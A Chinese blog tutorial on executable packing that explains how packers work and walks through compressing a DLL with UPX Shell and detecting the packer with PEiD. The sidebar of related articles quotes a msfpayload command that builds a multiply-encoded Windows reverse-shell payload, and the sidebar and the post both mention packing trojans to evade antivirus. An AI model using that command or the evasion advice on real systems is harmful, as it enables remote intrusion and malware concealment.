Reverse | 使用UPX对软件进行加壳

最新推荐文章于 2024-05-01 01:14:39 发布
最新推荐文章于 2024-05-01 01:14:39 发布
阅读量6.5k 收藏 19
点赞数 3
分类专栏: 逆向
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42646885/article/details/97240388
版权

1、相关知识:

(1)加壳

      加壳的全称应该是可执行程序资源压缩,是保护文件的常用手段。加壳过的程序可以直接运行,但是不能查看源代码.要经过脱壳才可以查看源代码。

      加壳的程序经常想尽办法阻止对程序的反汇编分析或者动态分析,以达到保护源码的目的。这种技术也常用来保护软件版权,防止被软件破解。

(2)加壳软件

      加壳软件可分为两类:一类是压缩,一类是保护。压缩的目的是减少程序体积,如ASPack、UPX、PECompact等。保护是为了防止程序被跟踪和调 试,如ASProtect、幻影。壳的存在会让我们找不到程序的真实入口点,从而不能正确的分析反汇编程序,也就对程序起到了一定的保护作用。

(3)加壳原理

      加壳是利用特殊的算法,对EXE、DLL文件里的资源进行压缩、加密。类似WINZIP 的效果,只不过这个压缩之后的文件,可以独立运行,解压过程完全隐蔽,都在内存中完成。它们附加在原程序上通过Windows加载器载入内存后,先于原始程序执行,得到控制权,执行过程中对原始程序进行解密、还原,还原完成后再把控制权交还给原始程序,执行原来的代码部分。加上外壳后,原始程序代码在磁盘文件中一般是以加密后的形式存在的,只在执行时在内存中还原,这样就可以比较有效地防止破解者对程序文件的非法修改,同时也可以防止程序被静态反编译。

      加壳工具在文件头里加了一段指令,告诉CPU,怎么才能解压自己。现在的CPU都很快,所以这个解压过程你看不出什么东西。软件一下子就打开了,只有你机 器配置非常差,才会感觉到不加壳和加壳后的软件运行速度的差别。当你加壳时,其实就是给可执行的文件加上个外衣。用户执行的只是这个外壳程序。当你执行这 个程序的时候这个壳就会把原来的程序在内存中解开,解开后,以后的就交给真正的程序。所以,这些的工作只是在内存中运行的,是不可以了解具体是怎么样在内 存中运行的。通常说的对外壳加密,都是指很多网上免费或者非免费的软件,被一些专门的加壳程序加壳,基本上是对程序的压缩或者不压缩。因为有的时候程序会 过大,需要压缩。但是大部分的程序是因为防止反跟踪,防止程序被人跟踪调试,防止算法程序不想被别人静态分析。加密代码和数据,保护你的程序数据的完整 性。不被修改或者窥视你程序的内幕。

      加“壳”虽然增加了CPU负担,但是减少了硬盘读写时间,实际应用时加“壳”以后程序运行速度更快(当然有的加“壳”以后会变慢,那是选择的加“壳”工具问题)。

      一般软件都加“壳”这样不但可以保护自己的软件不被破解、修改还可以增加运行时启动速度。

      加“壳”不等于木马,我们平时的绝大多数软件都加了自己的专用“壳”。

      RAR和ZIP都是压缩软件,不是加“壳”工具,他们解压时是需要进行磁盘读写,“壳”的解压缩是直接在内存中进行的。用RAR或者ZIP压缩一个病毒你试试,解压缩时杀毒软件肯定会发现。而用加“壳”手段封装木马,能发现的杀毒软件就少得多。

      木马加壳的原理很简单,在黑客营中提供的多数木马中,很多都是经过处理的,而这些处理就是所谓的加壳。当一个EXE的程序生成好后,很轻松的就可以利用诸 如资源工具和反汇编工具对它进行修改,但如果程序员给EXE程序加一个壳的话,那么至少这个加了壳的EXE程序就不是那么好修改了,如果想修改就必须先脱 壳。

4)UPX简介

      UPX (the Ultimate Packer for eXecutables)是一个著名的压缩壳,主要功能是压缩PE文件(比如exe,dll等文件),有时候也可能被病毒用于免杀。壳upx是一种保护程 序。一般是EXE文件的一种外保护措施,主要用途:

      1、让正规文件被保护起来,不容易被修改和破解。

      2、使文件压缩变小。

      3、保护杀毒软件安装程序,使之不受病毒侵害。

      4、木马,病毒的保护外壳,使之难以为攻破。

      利用特殊的算法,对EXE、DLL文件里的资源进行压缩。类似WINZIP 的效果,只不过这个压缩之后的文件,可以独立运行,解压过程完全隐蔽,都在内存中完成。解压原理,是加壳工具在文件头里加了一段指令,告诉CPU,怎么才 能解压自己。当加壳时,其实就是给可执行的文件加上个外衣。用户执行的只是这个外壳程序。当执行这个程序的时候这个壳就会把原来的程序在内存中解开,解开 后,以后的就交给真正的程序。

2、安装步骤:

下载地址:http://upxshell.sourceforge.net/download.html

Dowload:UPXShell-3.2.5.2006

下载后双击exe程序:

根据引导安装程序,完成安装后打开:

3、了解UPX功能及界面

Open  File(打开)按钮功能为打开需要加壳的目标文件。

在Compress(压缩)标签中有一Go(执行)按钮”,其功能为对打开的目标文件进行压缩,在Go按钮下方有一下拉列表,可选择压缩时的UPX版本,右框显示压缩进度与压缩后文件大小。

 在Options(选项)标签中,可以选择压缩操作的属性,如:创建备份文件、载入后自动压缩、完成后自动退出、压缩完成后测试文件等,在Compression level(压缩级别)中可在更快与更好之间进行选择。

4、使用UPX对文件进行压缩

找了一个dll文件复制到桌面,使用UPX打开:

打开后会跳转到Compress标签,单击GO按钮:

压缩后,检测文件大小,如果是程序测试是否正常运行。

如果在压缩过程中报错,说明不支持,换其他软件加壳。

5、使用PEiD对压缩文件进行探测

PEiD下载地址:https://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/PEiD-updated.shtml

打开PEiD,在文件中打开加壳后的文件,可看到加壳类型:

 

 

大青呐
关注
  • 3
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
MSF编码与upx加壳过杀软
悦分享
08-03 2319
本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件
UPX源码分析——加壳
wodafa的博客
02-23 6625
本文属于i春秋原创文章现金奖励计划,未经许可严禁转载。 0x00 前言 UPX作为一个跨平台的著名开源压缩壳,随着Android的兴起,许多开发者和公司将其和其变种应用在.so库的加密防护中。虽然针对UPX及其变种的使用和脱壳都有教程可查,但是至少在中文网络里并没有针对其源码的分析。作为一个好奇宝宝,我花了点时间读了一下UPX的源码并梳理了其对ELF文件的处理流程,希望起到抛砖引玉的作用,
Ubuntu使用upx加壳时报错:NotCompressibleException
Sven的忘却日记
09-02 1649
在ubuntu中使用官方3.95版本upx对程序进程加壳upx提示加壳失败:NotCompressibleException 原因是我写的demo程序编译后小于40kb,使用静态编译后,达到800+kb,可以正常压缩了。 Clion设置静态连接: 在 CMakeLists.txt文件中添加下面一行 ...
【CTF Reverse】XCTF GFSJ0490 simple-unpack Writeup(UPX壳+脱壳+反汇编)
HEX9CF的技术博客
05-01 431
菜鸡拿到了一个被加壳的二进制文件。
使用Metasploit生成攻击载荷——msfvenom免杀、upx加壳
渗透测试
06-06 7118
文章目录前言一、免杀1.msfvenom的使用2.多重编码二、加壳1.upx使用总结 前言 本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件 一、免杀 免杀字面意思就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描 1.msfvenom的使用 ┌──(root????kali)-[~] └─# msfvenom info
HZNUCTF REVERSE Signin题解——upx壳区段改名修复,动态调试脱壳
OrientalGlass的博客
04-02 1317
这个程序需要下两次硬件断点才能找到oep,老的upx加壳程序上来就可以找到pushad指令,但是这个程序刚运行时没有pushad指令,所以需要先找到pushad所在位置。按f9运行,可以发现程序停在了816f处,这里有popad,栈平衡以及jmp指令(跳转到153f处,很显然是大跳转,应该是跳转到oep)如果直接用upx脱壳会失败,后来才知道这是upx壳改了upx区段名,其实exeinfope这里也找到了upx的特征,已经有过提示。按f8,然后按照上面的操作,再给esp指向的内存单元下一个硬件访问断点。
使用upx脱壳工具脱壳
热门推荐
qq_53532337的博客
09-30 1万+
使用upx脱壳工具脱壳 查壳工具链接:https://www.52pojie.cn/thread-437586-1-1.html 脱壳工具链接:https://github.com/upx/upx/releases 先查壳 一般做到逆向的部分题的时候,把文件丢进ida会发现函数特别少,大部分都是加壳了(以攻防世界新手区第7题为例链接:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0) ida打开只
BUUCTF-Reverse:新年快乐 + 加壳与脱壳
_Co1a
11-20 1447
题目地址:https://buuoj.cn/challenges#%E6%96%B0%E5%B9%B4%E5%BF%AB%E4%B9%90 用IDA打开文件: 怎么可能才两个函数,猜测加了壳,直接查: 1、将文件拖进exeinfope(或者PEiD)查壳: 发现是upx壳——》拖入kaliLinux脱壳:upx -d 文件名 unpack “upx.exe -d” from http://upx.sf.net or any UPX/Generic unpacker 32位文件 脱壳,网上找脱壳机,
metasploit加壳upx
天元喜羊羊的博客
05-01 6289
root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikat
BUUCTF | Reverse入门笔记
pone2233的博客
03-22 1007
reverse2 在文件中我们使用Shift+F12我们能看到是 最后一段似乎是flag,可是不成功 、 {hacking_for_fun} 找到主题函数,我们F5一看 我发现了这一段与众不同 发他翻译一下 if ( pid ) { argv = (const char **)&stat_loc; waitpid(pid, &stat_loc, 0); } else { for ( i = 0; i <= strlen(&f
安卓手机软件Reverse视频倒放Pro.rar
10-23
《安卓手机软件Reverse视频倒放Pro深度解析》 在当今数字化时代,移动设备尤其是智能手机已经成为了我们日常生活中不可或缺的一部分,而各种应用程序更是丰富了我们的数字体验。今天我们要深入探讨的是一款专为安卓...
脱壳工具UPX -EXE/Dll资源压缩工具-UPX-4.2.2
最新发布
05-27
UPX有不光彩的使用记录,它被用来给木马和病毒加壳,躲避杀毒软件的查杀。 .................. UPX是一个着名的压缩壳,主要功能是压缩PE文件(比如exe,dll等文件),有时候也可能被病毒用于免杀。壳upx是一种保护...
C++ reverse介绍及使用
10-09
本篇文章将深入探讨`std::reverse`函数的使用方法,并通过实例来帮助读者理解和掌握。 `std::reverse`函数的基本语法如下: ```cpp void std::reverse(It first, It last); ``` 其中,`It`是输入迭代器的类型,`...
javascript 数组排序函数sort和reverse使用介绍
10-26
reverse方法将一个Array对象中的元素位置进行反转,sort方法返回一个元素已经进行了排序的 Array 对象,下面为大家介绍下
【广东大学生网络攻防大赛】Reverse | pyre 题目附件
05-24
【广东大学生网络攻防大赛】Reverse | pyre 题目附件
Reverse | 逆向入门学习(一)
qq_42646885的博客
07-18 6710
1、Reverse Reverse(逆向)是CTF竞赛中的一种常见题目类型,主要考察参赛选手逆向工程相关的知识,考查形式为通过对一个二进制程序(exe、dll或者是elf等)进行逆向分析,了解程序内部的实现机制,最终目的可能是得到一个密码,或者是编写一个注册机用于计算指定用户名对应的注册码等。 2、PEiD PEiD(PE Identifier)是一款著名的查壳工具,其功能...
CTF | Reverse练习之初探
qq_42646885的博客
07-18 3210
题目描述: 主机C:\Reverse\1目录下有一个CrackMe1.exe程序,运行这个程序的时候会提示输入一个密码,当输入正确的密码时,会弹出过关提示消息框,请对CrackMe1.exe程序进行逆向分析和调试,找到正确的过关密码。 实验步骤: 1、使用PEiD扫描 通过对CrackMe1.exe程序的观察,我们知道程序需要输入一个密码,当不输入任何数据就点击按钮时,提示如...
reverse spead软件
11-08
Reverse Speed软件是一种专门用于逆向加速视频播放的软件。通常在观看视频时,我们只能使用快进功能来加速播放速度,但这会导致音频和视频不同步,影响观看体验。而Reverse Speed软件则可以解决这个问题。 该软件的主要功能是使视频回放速度变快,同时保持音频正常播放。它可以将视频的播放速度加速到两倍甚至更高倍数,同时确保音频的播放速度与视频同步。这样一来,我们在观看视频时可以节省时间,但仍然能够听到正常的音频效果。 此外,Reverse Speed软件还具有其他一些特色功能。例如,它可以让你选择任意时间点开始加速播放,而不仅限于开始时。另外,它还提供了一些额外的调整选项,如音频音量和视频质量的调整等。 Reverse Speed软件对于一些特定需求场景非常有用。例如,你可能需要快速浏览一段教育视频,或者在观看一场演讲时希望加快演讲者的语速。使用这款软件,你可以在不错过重要信息的同时,节省时间。 总的来说,Reverse Speed软件是一款能够让视频播放加速而音频保持正常的软件。它在提高观看效率的同时,保持了音频和视频的同步,为用户带来更好的观看体验。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值